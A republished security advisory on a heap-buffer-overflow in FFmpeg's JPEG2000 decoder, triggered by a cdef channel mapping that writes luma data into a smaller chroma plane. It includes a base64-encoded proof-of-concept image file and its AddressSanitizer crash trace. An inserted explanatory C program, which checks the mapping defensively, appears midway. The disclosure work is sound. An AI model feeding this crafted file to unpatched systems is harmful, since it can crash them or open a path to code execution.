FFmpeg - Heap-buffer-overflow write in jpeg2000dec
The vulnerability is in the JPEG2000 decoder: when a chroma-subsampled pixel format is used together with a cdef atom, a buffer overflow can be triggered. An attacker could use it to achieve remote code execution or denial of service. Affected versions: FFmpeg below 8.0. 2025-9-8 00:0:44 Author: github.com

Package

JPEG2000 (FFmpeg)

Affected versions

< ffmpeg 8.0

Summary

The vulnerability lies in the Channel Definition cdef atom of JPEG2000 which is used to define the mapping of associated components to channels. If a chroma-subsampled pixel format is used together with the cdef atom, a corner case can be triggered. For example, for a YUV420P frame with a 64x32 resolution, the Y component will be 64*32+16+63=2127 bytes, and the U and V component will be 64*32/2+16+63=1103 bytes. By choosing a cdef with cn=0 and asoc=2, the data for the full resolution luma component Y with a height of 32 can be written into the smaller subsampled chroma plane U with a height of 16, thus overflowing the frame buffer picture->data[plane] by 64*16=1024 bytes.
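To make the corner case concrete, the following is an added example, not FFmpeg's code and not part of the advisory: it models the per-plane geometry the summary describes and checks a cdef mapping against it. The consistency condition is that every colour-channel cdef entry must map a component onto a plane with the same width and height; otherwise the decoder writes one component's rows into a plane that has fewer of them. `PixFmtModel`, `CdefEntry`, `PlaneGeom`, `MODEL_STRIDE_ALIGN` and `MODEL_BUFFER_SLACK` are this example's own names; the 64-byte stride alignment and the 16 + 63 slack are assumptions derived from the page's figures (64*32+16+63 and 64*32/2+16+63), not libavcodec definitions. The cdef entry cn=0, asoc=2 is the one the summary names (asoc is 1-based per the JP2 box definition, so asoc=2 is the U plane).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed from the page's numbers: a 32-pixel chroma row occupies a 64-byte linesize
 * (64*32/2 bytes for 16 rows), and each plane region carries 16 + 63 bytes of slack. */
#define MODEL_STRIDE_ALIGN 64
#define MODEL_BUFFER_SLACK (16 + 63)

/* Model of a planar pixel format: planes 1 and 2 are subsampled by
 * 2^log2_chroma_w horizontally and 2^log2_chroma_h vertically. */
typedef struct {
    const char *name;
    int nb_planes;
    int log2_chroma_w;
    int log2_chroma_h;
} PixFmtModel;

/* One cdef (Channel Definition box) entry: codestream component `cn` of type `typ`
 * is associated with colour channel `asoc` (1-based; 0 = whole image, 65535 = none). */
typedef struct {
    uint16_t cn;
    uint16_t typ;
    uint16_t asoc;
} CdefEntry;

/* Geometry of one plane: visible width/height and the padded linesize. */
typedef struct { int w, h, linesize; } PlaneGeom;

static const PixFmtModel YUV420P = { "yuv420p", 3, 1, 1 };

/* Constructed cdef tables: the page's corner case, and the identity mapping. */
static const CdefEntry PAGE_CDEF[]     = { { 0, 0, 2 } };
static const CdefEntry IDENTITY_CDEF[] = { { 0, 0, 1 }, { 1, 0, 2 }, { 2, 0, 3 } };

static int align_up(int v, int a) { return (v + a - 1) / a * a; }

/* Width, height and linesize of `plane` for a w x h frame. Chroma dimensions are
 * ceil-shifted so odd frame sizes still get a full chroma sample. */
static PlaneGeom plane_geom(const PixFmtModel *fmt, int plane, int w, int h) {
    PlaneGeom g;
    if (plane == 0 || plane > 2) {
        g.w = w; g.h = h;
    } else {
        g.w = -((-w) >> fmt->log2_chroma_w);
        g.h = -((-h) >> fmt->log2_chroma_h);
    }
    g.linesize = align_up(g.w, MODEL_STRIDE_ALIGN);
    return g;
}

/* Size of the buffer region backing `plane`, using the page's formula. */
size_t page_region_size(const PixFmtModel *fmt, int plane, int w, int h) {
    PlaneGeom g = plane_geom(fmt, plane, w, h);
    return (size_t)g.linesize * g.h + MODEL_BUFFER_SLACK;
}

/* Returns 1 when every colour cdef entry maps a component onto a plane of identical
 * dimensions, 0 otherwise. *max_overflow receives the largest number of bytes a
 * mismatched entry would write past its target plane's pixel data (0 if none).
 * Component `cn` is assumed to have the geometry of plane `cn`, which is the case
 * the summary describes (a subsampled codestream decoded to a matching pixel format). */
int cdef_is_consistent(const PixFmtModel *fmt, int w, int h,
                       const CdefEntry *cdef, int n, long *max_overflow) {
    int ok = 1;
    *max_overflow = 0;
    for (int i = 0; i < n; i++) {
        const CdefEntry *e = &cdef[i];
        if (e->typ != 0 || e->asoc == 0 || e->asoc == 0xFFFF)
            continue;                 /* not a colour channel bound to one plane */
        if (e->cn >= fmt->nb_planes || e->asoc > fmt->nb_planes) {
            ok = 0;                   /* refers to a component or plane that does not exist */
            continue;
        }
        PlaneGeom src = plane_geom(fmt, e->cn, w, h);
        PlaneGeom dst = plane_geom(fmt, e->asoc - 1, w, h);
        if (src.w == dst.w && src.h == dst.h)
            continue;
        ok = 0;
        /* Last byte touched when src.h rows are written with dst's stride, compared
         * with the bytes dst actually has for pixel data (slack not counted). */
        long last = (long)(src.h - 1) * dst.linesize + src.w;
        long have = (long)dst.linesize * dst.h;
        if (last - have > *max_overflow)
            *max_overflow = last - have;
    }
    return ok;
}

int main(void) {
    long overflow;
    int ok = cdef_is_consistent(&YUV420P, 64, 32, PAGE_CDEF, 1, &overflow);
    printf("Y region %zu bytes, U region %zu bytes\n",
           page_region_size(&YUV420P, 0, 64, 32), page_region_size(&YUV420P, 1, 64, 32));
    printf("cdef cn=0 asoc=2: %s, would overflow by %ld bytes\n",
           ok ? "consistent" : "rejected", overflow);
    return 0;
}
```

Running it reproduces the summary's figures: 2127 and 1103 bytes for the Y and U regions, and 1024 bytes of overflow for the cn=0, asoc=2 mapping, which the check rejects before anything is written. A decoder applying this condition would fail the frame on a mismatched cdef instead of copying luma rows into the chroma plane.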

Severity

High - Allows an attacker to potentially gain remote code execution or cause denial of service.

Proof of Concept

The following base64-encoded poc.jp2 triggers the ASAN panic below:

AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABJanAyaAAAABZpaGRyAAAAIAAAAEAA
AwgHAAAAAAAPY29scgEAAAAAABIAAAAcY2RlZgADAAAAAAACAAEAAAACAAIAAAACAAAAympwMmP/
T/9RAC8AAAAAAEAAAAAgAAAAAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAMHAQEHAgIHAgL/UgAMAAAA
AQAGAgIAAf9cABYgQEhIUEhIUEhIUEhIUEhIUEhIUP+QAAoAAAAAAGcAAf+T32gQCYf/AAgH/wAI
BwAAAKHzggABuwAAp9oMC0FzRGLwAACj6gkACchYhMatzBLXAACh848AZRCkKnPzhveC/MUI/qlg
AACx+oF/UCiMWOlqioxY6WqKAAD/2Q==

ASAN panic:

==1929947==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51a0000106cf at pc 0x5643c58b5858 bp 0x7fe552bfe410 sp 0x7fe552bfe408
WRITE of size 1 at 0x51a0000106cf thread T1 (av:jpeg200:df0)
    #0 0x5643c58b5857 in write_frame_8 libavcodec/jpeg2000dec.c:2368:1
    #1 0x5643c58b5857 in jpeg2000_decode_tile libavcodec/jpeg2000dec.c:2389:9
    #2 0x5643c51560ad in avcodec_default_execute2 libavcodec/avcodec.c:92:17
    #3 0x5643c58ae7d7 in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2903:5
    #4 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16
    #5 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15
    #6 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15
    #7 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19
    #8 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o
    #9 0x7fe555a33b7a in start_thread nptl/pthread_create.c:448:8
    #10 0x7fe555ab17b7 in __GI___clone3 misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:78

0x51a0000106cf is located 0 bytes after 1103-byte region [0x51a000010280,0x51a0000106cf)
allocated by thread T1 (av:jpeg200:df0) here:
    #0 0x5643c424b70b in posix_memalign
    #1 0x5643c774c426 in av_malloc libavutil/mem.c:107:9
    #2 0x5643c7702fd7 in av_buffer_alloc libavutil/buffer.c:82:12
    #3 0x5643c7702fd7 in av_buffer_allocz libavutil/buffer.c:95:24
    #4 0x5643c7705007 in pool_alloc_buffer libavutil/buffer.c:369:26
    #5 0x5643c7705007 in av_buffer_pool_get libavutil/buffer.c:407:15
    #6 0x5643c5650349 in video_get_buffer libavcodec/get_buffer.c:233:23
    #7 0x5643c5650349 in avcodec_default_get_buffer2 libavcodec/get_buffer.c:285:16
    #8 0x5643c53b76d4 in ff_get_buffer libavcodec/decode.c:1683:11
    #9 0x5643c5ca1781 in thread_get_buffer_internal libavcodec/pthread_frame.c:1041:11
    #10 0x5643c5ca1781 in ff_thread_get_buffer libavcodec/pthread_frame.c:1050:15
    #11 0x5643c58aceed in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2882:16
    #12 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16
    #13 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15
    #14 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15
    #15 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19
    #16 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o

Thread T1 (av:jpeg200:df0) created by T0 here:
    #0 0x5643c4230115 in pthread_create
    #1 0x5643c40df235 in init_thread libavcodec/pthread_frame.c:912:11
    #2 0x5643c40deaa8 in ff_frame_thread_init libavcodec/pthread_frame.c:971:15
    #3 0x5643c5156d2f in avcodec_open2 libavcodec/avcodec.c:328:15
    #4 0x5643c428e011 in dec_open fftools/ffmpeg_dec.c:1601:16
    #5 0x5643c428ced0 in dec_init fftools/ffmpeg_dec.c:1666:11
    #6 0x5643c4296c28 in ist_use fftools/ffmpeg_demux.c:993:15
    #7 0x5643c429720b in ist_filter_add fftools/ffmpeg_demux.c:1029:11
    #8 0x5643c42b0b10 in ifilter_bind_ist fftools/ffmpeg_filter.c:685:11
    #9 0x5643c42b06b4 in fg_create_simple fftools/ffmpeg_filter.c:1234:11
    #10 0x5643c42d704e in ost_bind_filter fftools/ffmpeg_mux_init.c:1000:15
    #11 0x5643c42d1a99 in ost_add fftools/ffmpeg_mux_init.c:1536:15
    #12 0x5643c42cf1e5 in map_auto_video fftools/ffmpeg_mux_init.c:1640:16
    #13 0x5643c42c5b37 in create_streams fftools/ffmpeg_mux_init.c:1969:19
    #14 0x5643c42c5b37 in of_open fftools/ffmpeg_mux_init.c:3335:11
    #15 0x5643c42db146 in open_files fftools/ffmpeg_opt.c:1367:15
    #16 0x5643c42db146 in ffmpeg_parse_options fftools/ffmpeg_opt.c:1423:11
    #17 0x5643c431c06f in main fftools/ffmpeg.c:991:11
    #18 0x7fe5559caca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

Timeline

Date reported: 08/04/2025
Date fixed: 08/06/2025
Date disclosed: 09/08/2025


Source: https://github.com/google/security-research/security/advisories/GHSA-39q3-f8jq-v6mg